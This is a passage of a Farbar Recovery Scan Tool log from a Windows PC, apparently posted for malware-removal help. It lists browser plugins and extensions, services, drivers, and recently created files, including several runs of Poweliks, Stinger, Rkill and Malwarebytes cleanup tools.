Aniel\AppData\Roaming\Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 [2016-10-19] FF NewTab: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> about:newtab FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> Secure Search FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> Secure Search FF SelectedSearchEngine: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> Secure Search FF Homepage: Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853 -> about:home FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-10-13] FF SearchPlugin: C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\Firefox\Profiles\6ymz7wj1.default-1446094861853\searchplugins\McSiteAdvisor.xml [2016-10-02] FF ProfilePath: C:\Users\Kyle Aniel\AppData\Roaming\AIR\SBACSecureBrowser8.1\Profiles\xt3vvi0n.default [2016-03-14] FF ProfilePath: C:\Users\Kyle Aniel\AppData\Roaming\AIR\CASecureBrowser8.0\Profiles\4pz09am7.default [2015-11-24] FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2016-08-12] [not signed] FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-07-11] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-11] () FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-07-07] () FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-11] () FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1218158.dll [2015-04-27] (Adobe Systems, Inc.) FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] () FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2016-08-25] (Google) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-16] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-16] (Oracle Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-07-07] () FF Plugin-x32: @mcafee.com/MVT -> C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll [2014-12-08] (McAfee, Inc.) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-10-07] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy.dll [2013-01-01] ( ROBLOX Corporation) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher64 -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy64.dll [2013-01-01] ( ROBLOX Corporation) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/O1DPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.) FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Kyle Aniel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS) FF Plugin ProgramFiles/Appdata: C:\Users\Kyle Aniel\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google) FF Plugin ProgramFiles/Appdata: C:\Users\Kyle Aniel\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google) Chrome: ======= CHR DefaultProfile: Default CHR HomePage: Default -> hxxp://google.com/ CHR StartupUrls: Default -> "hxxp://www.google.com/" CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C215US756D20151120&p={searchTerms} CHR DefaultSearchKeyword: Default -> mcafee CHR Plugin: (Widevine Content Decryption Module) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.8.866\_platform_specific\win_x86\widevinecdmadapter.dll => No File CHR Plugin: (Shockwave Flash) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\PepperFlash\20.0.0.267\pepflashplayer.dll => No File CHR Profile: C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default [2016-10-19] CHR Extension: (Google Slides) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-04-19] CHR Extension: (Crash King) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahbpokpfohopgmmdcgmgbhffofmepgoi [2015-09-21] CHR Extension: (Angry Birds) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj [2015-04-22] CHR Extension: (Google Docs) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-04-19] CHR Extension: (Google Drive) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21] CHR Extension: (Audiotool) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2015-10-03] CHR Extension: (YouTube) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24] CHR Extension: (Yahoo Partner) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmnghalbbgfaacplgindnehcnodlfpoc [2016-08-18] CHR Extension: (Google Search) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26] CHR Extension: (Pandora) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl [2015-04-19] CHR Extension: (Google Sheets) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-04-19] CHR Extension: (McAfee® WebAdvisor) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-09-23] CHR Extension: (Virtual Piano Black) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjagcpcbacoaogfljhglghpjhkmmfeeo [2015-04-24] CHR Extension: (Chrome Remote Desktop) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-10-03] CHR Extension: (Google Docs Offline) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14] CHR Extension: (TU-95 - Pilot the Plane!) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbjohfoloehbkffdihkengbkjgalmabj [2015-10-05] CHR Extension: (PowerPoint Online) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2015-04-24] CHR Extension: (Google Classroom) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhehppjhmmnlfbbopchdfldgimhfhfk [2015-04-24] CHR Extension: (Chrome Web Store Payments) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02] CHR Extension: (Virtual Piano) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\opjaiienaabnkhbddalhcbceikjlloij [2015-04-24] CHR Extension: (Gmail) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-19] CHR Extension: (Chrome Media Router) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-18] CHR Profile: C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\System Profile [2016-10-15] CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21] CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [599944 2014-12-04] (Autodesk Inc.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.) S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [445976 2016-09-29] (BlueStack Systems, Inc.) R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [425496 2016-09-29] (BlueStack Systems, Inc.) S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [466456 2016-09-29] (BlueStack Systems, Inc.) R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe [76616 2016-06-20] (Google Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3291848 2016-10-08] (Microsoft Corporation) S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-06-22] (Disc Soft Ltd) R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [10220624 2016-10-13] () [File not signed] R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2014-06-03] (Hewlett-Packard Company) [File not signed] R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company) R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [602888 2015-06-29] (Hewlett-Packard Development Company, L.P.) R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation) S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed] R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [365032 2016-01-26] (Intel Corporation) R2 IHA_MessageCenter; C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\Verizon_IHAMessageCenter.exe [372736 2015-01-27] (Verizon) [File not signed] R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed] S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation) R3 lmhosts; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation) R3 lmhosts; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [166152 2016-10-03] (McAfee, Inc.) R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [993824 2016-07-07] (McAfee, Inc.) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [334608 2013-07-24] (McAfee, Inc.) R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\\McCSPServiceHost.exe [1910000 2016-05-31] (McAfee, Inc.) R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [816128 2016-06-21] (McAfee, Inc.) S4 McOobeSv2; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-04-26] (McAfee, Inc.) R2 mfeicfcore; C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe [2763896 2013-08-19] (McAfee, Inc.) R2 mfeicfupdate; C:\Program Files (x86)\Internet Content Filter\UpdateService.exe [2260208 2013-08-19] (McAfee, Inc.) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-06-23] (McAfee, Inc.) R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-04-26] (McAfee, Inc.) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1454216 2016-06-17] (McAfee, Inc.) S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.) R2 NlaSvc; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation) R2 NlaSvc; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation) R2 nsi; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation) R2 nsi; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation) R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed] R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1045336 2016-05-25] (Intel Security, Inc.) R2 PMBDeviceInfoProvider; C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe [494592 2015-04-17] (Sony Corporation) R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [255096 2015-12-11] (Synaptics Incorporated) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation) R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-09-29] (BlueStack Systems) S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2016-09-27] (Bluestack System Inc. ) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [78632 2016-04-27] (McAfee, Inc.) R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.) R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-07-30] (Disc Soft Ltd) R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-07-30] (Disc Soft Ltd) S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.) R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [349960 2016-07-12] (Intel Corporation) R3 ikbevent; C:\WINDOWS\system32\DRIVERS\ikbevent.sys [21408 2013-08-13] () R3 imsevent; C:\WINDOWS\system32\DRIVERS\imsevent.sys [21920 2013-08-13] () R3 ISCT; C:\WINDOWS\System32\drivers\ISCTD64.sys [46568 2013-08-13] () R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-18] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [419616 2016-04-27] (McAfee, Inc.) S3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [181584 2014-10-01] (McAfee, Inc.) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [349480 2016-04-27] (McAfee, Inc.) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83608 2016-04-27] (McAfee, Inc.) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [493352 2016-04-27] (McAfee, Inc.) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [843048 2016-04-27] (McAfee, Inc.) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [519976 2016-04-27] (McAfee, Inc.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [100136 2016-04-27] (McAfee, Inc.) R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [243488 2016-04-27] (McAfee, Inc.) S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () R3 NETwNb64; C:\WINDOWS\System32\drivers\Netwbw02.sys [3506464 2015-11-15] (Intel Corporation) R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [751632 2015-05-14] (Realsil Semiconductor Corporation) S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-04-10] (Synaptics Incorporated) R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51320 2015-12-11] (Synaptics Incorporated) S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.) R3 sthid; C:\WINDOWS\System32\drivers\sthid.sys [21216 2016-09-01] (Splashtop Inc.) R1 VBoxNetAdp; C:\WINDOWS\system32\DRIVERS\VBoxNetAdp6.sys [121248 2016-09-12] (Oracle Corporation) R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [195936 2016-09-12] (Oracle Corporation) S2 vcs; C:\Program Files (x86)\Common Files\Avnex\vcs64.sys [4096 2016-08-05] () [File not signed] R3 VCSVADHWSer; C:\WINDOWS\system32\DRIVERS\vcsvad.sys [29320 2015-10-01] (AVSOFT Corp.) R3 VirtualButtons; C:\WINDOWS\System32\drivers\VirtualButtons.sys [32024 2013-10-04] (Intel Corporation) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation) R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.) R3 XSplit_Dummy; C:\WINDOWS\system32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited) S3 YMIDUSBW; C:\WINDOWS\system32\drivers\ymidusbx64.sys [43744 2015-07-28] (Yamaha Corporation) U3 aspnet_state; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-10-19 14:47 - 2016-10-19 14:54 - 00043137 _____ C:\Users\Kyle Aniel\Downloads\FRST.txt 2016-10-19 14:47 - 2016-10-19 14:47 - 02407424 _____ (Farbar) C:\Users\Kyle Aniel\Downloads\FRST64.exe 2016-10-19 14:47 - 2016-10-19 14:47 - 00000000 ____D C:\FRST 2016-10-19 06:30 - 2016-10-19 14:39 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\f70e5 2016-10-19 05:32 - 2016-10-19 05:32 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161019.053259.376.zip 2016-10-18 23:53 - 2016-10-18 23:53 - 00000000 ____D C:\WINDOWS\Minidump 2016-10-18 20:11 - 2016-10-18 20:12 - 00001291 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_201125.html 2016-10-18 19:56 - 2016-10-18 19:56 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.195634.11928.zip 2016-10-18 19:54 - 2016-10-18 19:56 - 00001291 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_195440.html 2016-10-18 19:48 - 2016-10-18 19:48 - 00107331 _____ C:\Users\Kyle Aniel\Desktop\Report.pdf 2016-10-18 18:53 - 2016-10-18 18:53 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-10-18 18:52 - 2016-10-18 19:40 - 00001172 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-10-18 18:52 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-10-18 18:52 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-10-18 18:52 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-10-18 18:50 - 2016-10-18 18:53 - 00003198 _____ C:\Users\banie_000\Desktop\Rkill.txt 2016-10-18 18:50 - 2016-10-18 18:51 - 22851472 _____ (Malwarebytes ) C:\Users\Kyle Aniel\Downloads\mbam-setup-2.2.1.1043.exe 2016-10-18 18:48 - 2016-10-18 18:50 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Kyle Aniel\Downloads\rkill.exe 2016-10-18 18:41 - 2016-10-18 18:47 - 00001228 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_184114.html 2016-10-18 18:40 - 2016-10-18 18:40 - 00000809 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_184053.html 2016-10-18 15:52 - 2016-10-18 15:52 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.155225.11816.zip 2016-10-18 14:48 - 2016-10-18 14:48 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.144800.10524.zip 2016-10-18 14:47 - 2016-10-18 14:47 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.144742.3924.zip 2016-10-18 14:45 - 2016-10-18 14:47 - 00224968 _____ (ESET) C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe 2016-10-18 14:35 - 2016-10-18 14:48 - 00001218 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_143535.html 2016-10-18 14:30 - 2016-10-19 05:15 - 00000120 ___RH C:\Users\Kyle Aniel\Desktop\Stinger.opt 2016-10-18 14:17 - 2016-10-18 14:17 - 00000000 ____D C:\Quarantine 2016-10-18 14:16 - 2016-10-18 14:26 - 00001291 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_141646.html 2016-10-18 14:16 - 2016-10-18 14:15 - 16056688 _____ (McAfee Inc) C:\Users\Kyle Aniel\Desktop\stinger64.exe 2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012xnj 2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle 